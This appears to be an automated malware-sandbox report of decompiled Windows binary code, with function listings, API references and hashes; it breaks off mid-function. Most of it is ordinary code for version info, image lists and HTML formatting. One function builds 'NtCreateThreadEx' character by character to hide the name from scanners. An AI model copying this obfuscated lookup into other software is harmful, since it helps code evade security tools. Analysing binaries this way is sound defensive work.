                                                                                                  0x00408c52
                                                                                                  0x00408c58
                                                                                                  0x00408c58
                                                                                                  0x00408c6f
                                                                                                  0x00408c71
                                                                                                  0x00408c73
                                                                                                  0x00408c83
                                                                                                  0x00408c89
                                                                                                  0x00408c89
                                                                                                  0x00408c8a
                                                                                                  0x00408c8f
                                                                                                  0x00408c91
                                                                                                  0x00408c9a
                                                                                                  0x00408c93
                                                                                                  0x00408c93
                                                                                                  0x00408c93
                                                                                                  0x00408c9f
                                                                                                  0x00408ca5
                                                                                                  0x00408caf
                                                                                                  0x00408cbc
                                                                                                  0x00408cc2
                                                                                                  0x00408cc7
                                                                                                  0x00408ccd
                                                                                                  0x00408cd0
                                                                                                  0x00408cd6
                                                                                                  0x00408cd7
                                                                                                  0x00408cd8
                                                                                                  0x00408cde
                                                                                                  0x00408ce3
                                                                                                  0x00408ceb
                                                                                                  0x00408cfe
                                                                                                  0x00408d03
                                                                                                  0x00408d06
                                                                                                  0x00408d0c
                                                                                                  0x00408d21
                                                                                                  0x00408d27
                                                                                                  0x00408d0c
                                                                                                  0x00000000
                                                                                                  0x00408ca7
                                                                                                  0x00408ca7
                                                                                                  0x00408cad
                                                                                                  0x00408d28
                                                                                                  0x00408d2e
                                                                                                  0x00408d35
                                                                                                  0x00408d36
                                                                                                  0x00408d42
                                                                                                  0x00408d48
                                                                                                  0x00408d4e
                                                                                                  0x00408d54
                                                                                                  0x00408d5a
                                                                                                  0x00408d60
                                                                                                  0x00408d66
                                                                                                  0x00408d6c
                                                                                                  0x00408d72
                                                                                                  0x00408d73
                                                                                                  0x00408d7f
                                                                                                  0x00408d85
                                                                                                  0x00408d8a
                                                                                                  0x00408d8f
                                                                                                  0x00408d90
                                                                                                  0x00408da8
                                                                                                  0x00408db9
                                                                                                  0x00408dbf
                                                                                                  0x00408dc5
                                                                                                  0x00408dc5
                                                                                                  0x00000000
                                                                                                  0x00408cad
                                                                                                  0x00408ca5
                                                                                                  0x00408af6
                                                                                                  0x00408afc
                                                                                                  0x00408b07
                                                                                                  0x00408b2a
                                                                                                  0x00408b38
                                                                                                  0x00408b53
                                                                                                  0x00408b56
                                                                                                  0x00408b62
                                                                                                  0x00408b6a
                                                                                                  0x00408b6a
                                                                                                  0x00408b2a
                                                                                                  0x00408b07
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00408D85
                                                                                                  • {Unknown}, xrefs: 00408BA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                  • API String ID: 4111938811-1819279800
                                                                                                  • Opcode ID: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                  • Instruction ID: 89cdabe1f300c5598f457b205db6f7bf21b56caa474a1127ebd0a37068e91017
                                                                                                  • Opcode Fuzzy Hash: da6163a693f44e98dc338dc238bd85c57536ed619285caa4b2ce51e2a39adb2b
                                                                                                  • Instruction Fuzzy Hash: FD7184B280021DBEDB219B51DD85EDB377CEF08354F0444BAFA08B6191DB799E848F68
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E0040B04D(intOrPtr* __edi, short* _a4) {
                                                                                                  				int _v8;
                                                                                                  				void* _v12;
                                                                                                  				void* _v16;
                                                                                                  				int _v20;
                                                                                                  				long _v60;
                                                                                                  				char _v572;
                                                                                                  				void* __esi;
                                                                                                  				int _t47;
                                                                                                  				void* _t50;
                                                                                                  				signed short* _t76;
                                                                                                  				void* _t81;
                                                                                                  				void* _t84;
                                                                                                  				intOrPtr* _t96;
                                                                                                  				int _t97;
                                                                                                  
                                                                                                  				_t96 = __edi;
                                                                                                  				_t97 = 0;
                                                                                                  				_v20 = 0;
                                                                                                  				_t47 = GetFileVersionInfoSizeW(_a4,  &_v20);
                                                                                                  				_v8 = _t47;
                                                                                                  				if(_t47 > 0) {
                                                                                                  					_t50 = E00405AA7(__edi);
                                                                                                  					_push(_v8);
                                                                                                  					L0040B26C();
                                                                                                  					_t84 = _t50;
                                                                                                  					GetFileVersionInfoW(_a4, 0, _v8, _t84);
                                                                                                  					if(VerQueryValueW(_t84, "\\",  &_v12,  &_v8) != 0) {
                                                                                                  						_t81 = _v12;
                                                                                                  						_t11 = _t81 + 0x30; // 0x4d46e853
                                                                                                  						 *((intOrPtr*)(__edi + 4)) =  *_t11;
                                                                                                  						_t13 = _t81 + 8; // 0x8d50ffff
                                                                                                  						 *__edi =  *_t13;
                                                                                                  						_t14 = _t81 + 0x14; // 0x5900004d
                                                                                                  						 *((intOrPtr*)(__edi + 0xc)) =  *_t14;
                                                                                                  						_t16 = _t81 + 0x10; // 0x65e850ff
                                                                                                  						 *((intOrPtr*)(__edi + 8)) =  *_t16;
                                                                                                  						_t18 = _t81 + 0x24; // 0xf4680000
                                                                                                  						 *((intOrPtr*)(__edi + 0x10)) =  *_t18;
                                                                                                  						_t20 = _t81 + 0x28; // 0xbb0040cd
                                                                                                  						 *((intOrPtr*)(__edi + 0x14)) =  *_t20;
                                                                                                  					}
                                                                                                  					if(VerQueryValueW(_t84, L"\\VarFileInfo\\Translation",  &_v16,  &_v8) == 0) {
                                                                                                  						L5:
                                                                                                  						wcscpy( &_v60, L"040904E4");
                                                                                                  					} else {
                                                                                                  						_t76 = _v16;
                                                                                                  						_push(_t76[1] & 0x0000ffff);
                                                                                                  						_push( *_t76 & 0x0000ffff);
                                                                                                  						_push(L"%4.4X%4.4X");
                                                                                                  						_push(0x14);
                                                                                                  						_push( &_v60);
                                                                                                  						L0040B1EC();
                                                                                                  						if(E0040AFBE( &_v572, _t84,  &_v60, 0x40c4e8) == 0) {
                                                                                                  							goto L5;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					E0040AFBE(_t96 + 0x18, _t84,  &_v60, L"ProductName");
                                                                                                  					E0040AFBE(_t96 + 0x218, _t84,  &_v60, L"FileDescription");
                                                                                                  					E0040AFBE(_t96 + 0x418, _t84,  &_v60, L"FileVersion");
                                                                                                  					E0040AFBE(_t96 + 0x618, _t84,  &_v60, L"ProductVersion");
                                                                                                  					E0040AFBE(_t96 + 0x818, _t84,  &_v60, L"CompanyName");
                                                                                                  					E0040AFBE(_t96 + 0xa18, _t84,  &_v60, L"InternalName");
                                                                                                  					E0040AFBE(_t96 + 0xc18, _t84,  &_v60, L"LegalCopyright");
                                                                                                  					E0040AFBE(_t96 + 0xe18, _t84,  &_v60, L"OriginalFileName");
                                                                                                  					_push(_t84);
                                                                                                  					_t97 = 1;
                                                                                                  					L0040B272();
                                                                                                  				}
                                                                                                  				return _t97;
                                                                                                  			}

















                                                                                                  0x0040b04d
                                                                                                  0x0040b05e
                                                                                                  0x0040b060
                                                                                                  0x0040b063
                                                                                                  0x0040b06a
                                                                                                  0x0040b06d
                                                                                                  0x0040b076
                                                                                                  0x0040b07b
                                                                                                  0x0040b07e
                                                                                                  0x0040b084
                                                                                                  0x0040b08e
                                                                                                  0x0040b0a8
                                                                                                  0x0040b0aa
                                                                                                  0x0040b0ad
                                                                                                  0x0040b0b0
                                                                                                  0x0040b0b3
                                                                                                  0x0040b0b6
                                                                                                  0x0040b0b8
                                                                                                  0x0040b0bb
                                                                                                  0x0040b0be
                                                                                                  0x0040b0c1
                                                                                                  0x0040b0c4
                                                                                                  0x0040b0c7
                                                                                                  0x0040b0ca
                                                                                                  0x0040b0cd
                                                                                                  0x0040b0cd
                                                                                                  0x0040b0e5
                                                                                                  0x0040b11f
                                                                                                  0x0040b128
                                                                                                  0x0040b0e7
                                                                                                  0x0040b0e7
                                                                                                  0x0040b0f1
                                                                                                  0x0040b0f2
                                                                                                  0x0040b0f3
                                                                                                  0x0040b0fb
                                                                                                  0x0040b0fd
                                                                                                  0x0040b0fe
                                                                                                  0x0040b11d
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040b11d
                                                                                                  0x0040b13c
                                                                                                  0x0040b151
                                                                                                  0x0040b166
                                                                                                  0x0040b17b
                                                                                                  0x0040b190
                                                                                                  0x0040b1a5
                                                                                                  0x0040b1ba
                                                                                                  0x0040b1cf
                                                                                                  0x0040b1d6
                                                                                                  0x0040b1d7
                                                                                                  0x0040b1d8
                                                                                                  0x0040b1de
                                                                                                  0x0040b1e3

                                                                                                  APIs
                                                                                                  • GetFileVersionInfoSizeW.VERSION(004064D2,?,00000000), ref: 0040B063
                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040B07E
                                                                                                  • GetFileVersionInfoW.VERSION(004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B08E
                                                                                                  • VerQueryValueW.VERSION(00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0A1
                                                                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,0040CD2C,004064D2,?,004064D2,00000000,?,00000000,00000000,004064D2,?,00000000), ref: 0040B0DE
                                                                                                  • _snwprintf.MSVCRT ref: 0040B0FE
                                                                                                  • wcscpy.MSVCRT ref: 0040B128
                                                                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040B1D8
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                  • API String ID: 1223191525-1542517562
                                                                                                  • Opcode ID: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                  • Instruction ID: 283451b663653e95218ba9e6ce5340ec929c4f2fba7a9b8c11281d5ea0e9195a
                                                                                                  • Opcode Fuzzy Hash: 7d0a25dbe63dd51685ec4fd467e5617a4705a8ce8e8c15efb6301eb2ec3eaad9
                                                                                                  • Instruction Fuzzy Hash: E34144B2940219BAC704EBA5DD41DDEB7BDEF08704F100177B905B3181DB78AA59CBD8
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 76%
                                                                                                  			E0040A1EF(struct HINSTANCE__** __esi) {
                                                                                                  				char _v8;
                                                                                                  				char _v9;
                                                                                                  				char _v10;
                                                                                                  				char _v11;
                                                                                                  				char _v12;
                                                                                                  				char _v13;
                                                                                                  				char _v14;
                                                                                                  				char _v15;
                                                                                                  				char _v16;
                                                                                                  				char _v17;
                                                                                                  				char _v18;
                                                                                                  				char _v19;
                                                                                                  				char _v20;
                                                                                                  				char _v21;
                                                                                                  				char _v22;
                                                                                                  				char _v23;
                                                                                                  				char _v24;
                                                                                                  				struct HINSTANCE__* _t27;
                                                                                                  
                                                                                                  				if( *__esi != 0) {
                                                                                                  					L3:
                                                                                                  					return 1;
                                                                                                  				}
                                                                                                  				_t27 = LoadLibraryW(L"ntdll.dll");
                                                                                                  				 *__esi = _t27;
                                                                                                  				if(_t27 != 0) {
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosd");
                                                                                                  					asm("stosw");
                                                                                                  					asm("stosb");
                                                                                                  					_v24 = 0x4e;
                                                                                                  					_v23 = 0x74;
                                                                                                  					_v13 = 0x65;
                                                                                                  					_v12 = 0x61;
                                                                                                  					_v18 = 0x74;
                                                                                                  					_v17 = 0x65;
                                                                                                  					_v22 = 0x43;
                                                                                                  					_v14 = 0x72;
                                                                                                  					_v11 = 0x64;
                                                                                                  					_v21 = 0x72;
                                                                                                  					_v10 = 0x45;
                                                                                                  					_v9 = 0x78;
                                                                                                  					_v20 = 0x65;
                                                                                                  					_v19 = 0x61;
                                                                                                  					_v16 = 0x54;
                                                                                                  					_v15 = 0x68;
                                                                                                  					_v8 = 0;
                                                                                                  					__esi[1] = GetProcAddress(_t27,  &_v24);
                                                                                                  					goto L3;
                                                                                                  				}
                                                                                                  				return 0;
                                                                                                  			}





















                                                                                                  0x0040a1f8
                                                                                                  0x0040a26d
                                                                                                  0x00000000
                                                                                                  0x0040a26f
                                                                                                  0x0040a205
                                                                                                  0x0040a20b
                                                                                                  0x0040a20d
                                                                                                  0x0040a213
                                                                                                  0x0040a214
                                                                                                  0x0040a215
                                                                                                  0x0040a216
                                                                                                  0x0040a217
                                                                                                  0x0040a219
                                                                                                  0x0040a21f
                                                                                                  0x0040a223
                                                                                                  0x0040a227
                                                                                                  0x0040a22b
                                                                                                  0x0040a22f
                                                                                                  0x0040a233
                                                                                                  0x0040a237
                                                                                                  0x0040a23b
                                                                                                  0x0040a23f
                                                                                                  0x0040a243
                                                                                                  0x0040a247
                                                                                                  0x0040a24b
                                                                                                  0x0040a24f
                                                                                                  0x0040a253
                                                                                                  0x0040a257
                                                                                                  0x0040a25b
                                                                                                  0x0040a25f
                                                                                                  0x0040a269
                                                                                                  0x00000000
                                                                                                  0x0040a26c
                                                                                                  0x0040a271

                                                                                                  APIs
                                                                                                  • LoadLibraryW.KERNEL32(ntdll.dll,?,?,?,?,0040A2A4), ref: 0040A1FF
                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0040A263
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                  • String ID: C$E$N$T$a$a$d$e$e$e$h$ntdll.dll$r$r$t$t$x
                                                                                                  • API String ID: 2574300362-1257427173
                                                                                                  • Opcode ID: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                  • Instruction ID: 28a3addb3bc40b583479f690f9d6e65064931713b616a12c977b5f47a4008353
                                                                                                  • Opcode Fuzzy Hash: 7c4b767998ad850fb5a7cf24f594afd5e084a11fa120f3cae330cd392d2e2909
                                                                                                  • Instruction Fuzzy Hash: 08110A2090C6C9EDEB12C7FCC40879EBEF15B26709F0881ECC585B6292C6BA5758C776
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 63%
                                                                                                  			E00407F8D(void* __eax) {
                                                                                                  				struct _SHFILEINFOW _v692;
                                                                                                  				void _v1214;
                                                                                                  				short _v1216;
                                                                                                  				void* _v1244;
                                                                                                  				void* _v1248;
                                                                                                  				void* _v1252;
                                                                                                  				void* _v1256;
                                                                                                  				void* _v1268;
                                                                                                  				void* _t37;
                                                                                                  				long _t38;
                                                                                                  				long _t46;
                                                                                                  				long _t48;
                                                                                                  				long _t58;
                                                                                                  				void* _t62;
                                                                                                  				intOrPtr* _t64;
                                                                                                  
                                                                                                  				_t64 = ImageList_Create;
                                                                                                  				_t62 = __eax;
                                                                                                  				if( *((intOrPtr*)(__eax + 0x2b4)) != 0) {
                                                                                                  					if( *((intOrPtr*)(__eax + 0x2bc)) == 0) {
                                                                                                  						_t48 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
                                                                                                  						 *(_t62 + 0x2a8) = _t48;
                                                                                                  						__imp__ImageList_SetImageCount(_t48, 0);
                                                                                                  						_push( *(_t62 + 0x2a8));
                                                                                                  					} else {
                                                                                                  						_v692.hIcon = 0;
                                                                                                  						memset( &(_v692.iIcon), 0, 0x2b0);
                                                                                                  						_v1216 = 0;
                                                                                                  						memset( &_v1214, 0, 0x208);
                                                                                                  						GetWindowsDirectoryW( &_v1216, 0x104);
                                                                                                  						_t58 = SHGetFileInfoW( &_v1216, 0,  &_v692, 0x2b4, 0x4001);
                                                                                                  						 *(_t62 + 0x2a8) = _t58;
                                                                                                  						_push(_t58);
                                                                                                  					}
                                                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 1, ??);
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t62 + 0x2b8)) != 0) {
                                                                                                  					_t46 =  *_t64(0x20, 0x20, 0x19, 1, 1);
                                                                                                  					 *(_t62 + 0x2ac) = _t46;
                                                                                                  					__imp__ImageList_SetImageCount(_t46, 0);
                                                                                                  					SendMessageW( *(_t62 + 0x2a0), 0x1003, 0,  *(_t62 + 0x2ac));
                                                                                                  				}
                                                                                                  				 *(_t62 + 0x2a4) =  *_t64(0x10, 0x10, 0x19, 1, 1);
                                                                                                  				_v1248 = LoadImageW(GetModuleHandleW(0), 0x85, 0, 0x10, 0x10, 0x1000);
                                                                                                  				_t37 = LoadImageW(GetModuleHandleW(0), 0x86, 0, 0x10, 0x10, 0x1000);
                                                                                                  				_v1244 = _t37;
                                                                                                  				__imp__ImageList_SetImageCount( *(_t62 + 0x2a4), 0);
                                                                                                  				_t38 = GetSysColor(0xf);
                                                                                                  				_v1248 = _t38;
                                                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1256, _t38);
                                                                                                  				ImageList_AddMasked( *(_t62 + 0x2a4), _v1252, _v1248);
                                                                                                  				DeleteObject(_v1268);
                                                                                                  				DeleteObject(_v1268);
                                                                                                  				return SendMessageW(E0040331D( *(_t62 + 0x2a0)), 0x1208, 0,  *(_t62 + 0x2a4));
                                                                                                  			}


















                                                                                                  0x00407f9b
                                                                                                  0x00407fa3
                                                                                                  0x00407fad
                                                                                                  0x00407fb9
                                                                                                  0x0040802e
                                                                                                  0x00408032
                                                                                                  0x00408038
                                                                                                  0x0040803e
                                                                                                  0x00407fbb
                                                                                                  0x00407fc9
                                                                                                  0x00407fd0
                                                                                                  0x00407fe0
                                                                                                  0x00407fe5
                                                                                                  0x00407ff7
                                                                                                  0x00408015
                                                                                                  0x0040801b
                                                                                                  0x00408021
                                                                                                  0x00408021
                                                                                                  0x00408051
                                                                                                  0x00408051
                                                                                                  0x00408059
                                                                                                  0x00408065
                                                                                                  0x00408069
                                                                                                  0x0040806f
                                                                                                  0x00408087
                                                                                                  0x00408087
                                                                                                  0x0040809c
                                                                                                  0x004080bb
                                                                                                  0x004080d1
                                                                                                  0x004080de
                                                                                                  0x004080e2
                                                                                                  0x004080ea
                                                                                                  0x004080fb
                                                                                                  0x00408105
                                                                                                  0x00408115
                                                                                                  0x00408121
                                                                                                  0x00408127
                                                                                                  0x00408150

                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00407FD0
                                                                                                  • memset.MSVCRT ref: 00407FE5
                                                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00407FF7
                                                                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 00408015
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040802E
                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 00408038
                                                                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 00408051
                                                                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00408065
                                                                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000000), ref: 0040806F
                                                                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00408087
                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00408093
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080A2
                                                                                                  • LoadImageW.USER32 ref: 004080B4
                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004080BF
                                                                                                  • LoadImageW.USER32 ref: 004080D1
                                                                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 004080E2
                                                                                                  • GetSysColor.USER32(0000000F), ref: 004080EA
                                                                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 00408105
                                                                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 00408115
                                                                                                  • DeleteObject.GDI32(?), ref: 00408121
                                                                                                  • DeleteObject.GDI32(?), ref: 00408127
                                                                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 00408144
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                  • String ID:
                                                                                                  • API String ID: 304928396-0
                                                                                                  • Opcode ID: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                  • Instruction ID: fc02d650de5297a4f4a3b2912da131a5170d4a501b91b7a2a94f7b4638737e48
                                                                                                  • Opcode Fuzzy Hash: d4ab9f05862d1af7c7dd0e0dd7fd39e91fe05cdd650fdb134c44776c28691368
                                                                                                  • Instruction Fuzzy Hash: 8F418971640304FFE6306B61DD8AF977BACFF89B00F00092DB795A51D1DAB55450DB29
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 69%
                                                                                                  			E0040AE90(void* __esi, wchar_t* _a4, wchar_t* _a8) {
                                                                                                  				int _v8;
                                                                                                  				void _v518;
                                                                                                  				long _v520;
                                                                                                  				void _v1030;
                                                                                                  				char _v1032;
                                                                                                  				intOrPtr _t32;
                                                                                                  				wchar_t* _t57;
                                                                                                  				void* _t58;
                                                                                                  				void* _t59;
                                                                                                  				void* _t60;
                                                                                                  
                                                                                                  				_t58 = __esi;
                                                                                                  				_v520 = 0;
                                                                                                  				memset( &_v518, 0, 0x1fc);
                                                                                                  				_v1032 = 0;
                                                                                                  				memset( &_v1030, 0, 0x1fc);
                                                                                                  				_t60 = _t59 + 0x18;
                                                                                                  				_v8 = 1;
                                                                                                  				if( *((intOrPtr*)(__esi + 4)) == 0xffffffff &&  *((intOrPtr*)(__esi + 8)) <= 0) {
                                                                                                  					_v8 = 0;
                                                                                                  				}
                                                                                                  				_t57 = _a4;
                                                                                                  				 *_t57 = 0;
                                                                                                  				if(_v8 != 0) {
                                                                                                  					wcscpy(_t57, L"<font");
                                                                                                  					_t32 =  *((intOrPtr*)(_t58 + 8));
                                                                                                  					if(_t32 > 0) {
                                                                                                  						_push(_t32);
                                                                                                  						_push(L" size=\"%d\"");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v520);
                                                                                                  						L0040B1EC();
                                                                                                  						wcscat(_t57,  &_v520);
                                                                                                  						_t60 = _t60 + 0x18;
                                                                                                  					}
                                                                                                  					_t33 =  *((intOrPtr*)(_t58 + 4));
                                                                                                  					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
                                                                                                  						_push(E0040ADC0(_t33,  &_v1032));
                                                                                                  						_push(L" color=\"#%s\"");
                                                                                                  						_push(0xff);
                                                                                                  						_push( &_v520);
                                                                                                  						L0040B1EC();
                                                                                                  						wcscat(_t57,  &_v520);
                                                                                                  					}
                                                                                                  					wcscat(_t57, ">");
                                                                                                  				}
                                                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                  					wcscat(_t57, L"<b>");
                                                                                                  				}
                                                                                                  				wcscat(_t57, _a8);
                                                                                                  				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
                                                                                                  					wcscat(_t57, L"</b>");
                                                                                                  				}
                                                                                                  				if(_v8 != 0) {
                                                                                                  					wcscat(_t57, L"</font>");
                                                                                                  				}
                                                                                                  				return _t57;
                                                                                                  			}













                                                                                                  0x0040ae90
                                                                                                  0x0040aeab
                                                                                                  0x0040aeb2
                                                                                                  0x0040aec0
                                                                                                  0x0040aec7
                                                                                                  0x0040aecc
                                                                                                  0x0040aed3
                                                                                                  0x0040aeda
                                                                                                  0x0040aee1
                                                                                                  0x0040aee1
                                                                                                  0x0040aee7
                                                                                                  0x0040aeea
                                                                                                  0x0040aeed
                                                                                                  0x0040aef9
                                                                                                  0x0040aefe
                                                                                                  0x0040af05
                                                                                                  0x0040af07
                                                                                                  0x0040af08
                                                                                                  0x0040af13
                                                                                                  0x0040af18
                                                                                                  0x0040af19
                                                                                                  0x0040af26
                                                                                                  0x0040af2b
                                                                                                  0x0040af2b
                                                                                                  0x0040af2e
                                                                                                  0x0040af34
                                                                                                  0x0040af43
                                                                                                  0x0040af44
                                                                                                  0x0040af4f
                                                                                                  0x0040af54
                                                                                                  0x0040af55
                                                                                                  0x0040af62
                                                                                                  0x0040af67
                                                                                                  0x0040af70
                                                                                                  0x0040af76
                                                                                                  0x0040af7a
                                                                                                  0x0040af82
                                                                                                  0x0040af88
                                                                                                  0x0040af8d
                                                                                                  0x0040af97
                                                                                                  0x0040af9f
                                                                                                  0x0040afa5
                                                                                                  0x0040afa9
                                                                                                  0x0040afb1
                                                                                                  0x0040afb7
                                                                                                  0x0040afbd

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.282124709.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.282119687.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282135175.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282140854.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000003.00000002.282146360.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                  • API String ID: 3143752011-1996832678
                                                                                                  • Opcode ID: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                  • Instruction ID: 2e7f7f44a8c08f278b605cd2082ab28bfbf3198b566a778c3f72e8233e5ba29a
                                                                                                  • Opcode Fuzzy Hash: 330f77f369881cb7aaffb2d4d29cef926f955dd174757b27785871b236def110
                                                                                                  • Instruction Fuzzy Hash: 2531C6B2904306A9D720EAA59D86E7E73BCDF40714F10807FF214B61C2DB7C9944D69D
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 97%
                                                                                                  			E00403C03(void* __eflags) {
                                                                                                  				void* __ebx;
                                                                                                  				void* __ecx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				void* _t88;
                                                                                                  				void* _t108;
                                                                                                  				void* _t113;
                                                                                                  				void* _t119;
                                                                                                  				void* _t121;
                                                                                                  				void* _t122;
                                                                                                  				void* _t123;
                                                                                                  				intOrPtr* _t124;
                                                                                                  				void* _t134;
                                                                                                  
                                                                                                  				_t113 = _t108;
                                                                                                  				E00403B3C(_t113);
                                                                                                  				E00403B16(_t113);
                                                                                                  				DragAcceptFiles( *(_t113 + 0x10), 1);
                                                                                                  				 *0x40f2f0 = SetWindowLongW(GetDlgItem( *(_t113 + 0x10), 0x3fd), 0xfffffffc, E00403A73);
                                                                                                  				E00402DDD( *(_t113 + 0x10), _t113 + 0x40);
                                                                                                  				 *(_t124 + 0x14) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x10, 0x10, 0);
                                                                                                  				 *((intOrPtr*)(_t124 + 0x24)) = LoadImageW(GetModuleHandleW(0), 0x65, 1, 0x20, 0x20, 0);
                                                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 0,  *(_t124 + 0x10));
                                                                                                  				SendMessageW( *(_t113 + 0x10), 0x80, 1,  *(_t124 + 0x14));
